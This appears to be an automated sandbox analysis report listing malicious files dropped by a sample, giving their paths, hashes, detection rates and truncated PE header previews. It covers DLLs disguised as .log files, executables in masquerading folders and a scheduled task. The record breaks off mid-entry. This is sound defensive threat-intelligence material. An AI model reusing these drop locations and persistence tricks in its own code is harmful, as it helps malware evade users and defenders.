Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\KhRLcxhs.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	5.905167202474779
Encrypted:	false
SSDEEP:	1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
MD5:	06442F43E1001D860C8A19A752F19085
SHA1:	9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
SHA-256:	6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
SHA-512:	3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

C:\Users\user\Desktop\NjDuyglo.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TNeBQEiF.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WDUsXAjy.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XXhkisgW.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YUJsDsvR.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZoAIeOtr.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	5.905167202474779
Encrypted:	false
SSDEEP:	1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
MD5:	06442F43E1001D860C8A19A752F19085
SHA1:	9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
SHA-256:	6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
SHA-512:	3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

C:\Users\user\Desktop\aINBpFrP.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cLzjLovK.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cvxRAgnn.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gmoIHdog.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\hGBASUlD.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lZGHkaDU.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pXgQVFeT.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\qMYGMWSI.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rYNynbxj.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\tSQOebbY.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vIZXTCIC.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\yyQNbzJv.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Documents\DBFIEHDHII.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3251712
Entropy (8bit):	6.652379087437616
Encrypted:	false
SSDEEP:	49152:gkhAB1FCb+huU1HjzRmJ1WgxEQBOHOH8wxIXRdGmEyFi:gkhf+huU1DzRmJ132QZUYmEy
MD5:	9B3EF3C58C88279086B777393B2CE36B
SHA1:	26DB0933B6E16EAE12767CD29B4E173B7D0B1D42
SHA-256:	3D4A95B512C8629F9D45145D14133E673B466903C399F54ED6279ADB0BD5E6BC
SHA-512:	088FDDBF009FFF5AF3A86DE4C64AC899F0356E024D1CD78F2AFA5CCF3E88D8F7231E36D951B2E41C1B714ECDB127F59C13C570FF6880CA74331511E20435EBA2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1......H2...@.................................W...k.............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...ybivbako..........................@...iccljchg......1......x1.............@....taggant.0....1.."...\|1.............@...........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Documents\DBFIEHDHII.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.413617143642233
Encrypted:	false
SSDEEP:	6:fO+tXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lUt0:m+Zf2RKQ1CGAFAjzvYRQVUt0
MD5:	43C8F728FB7E77E75415B9E94091EFC4
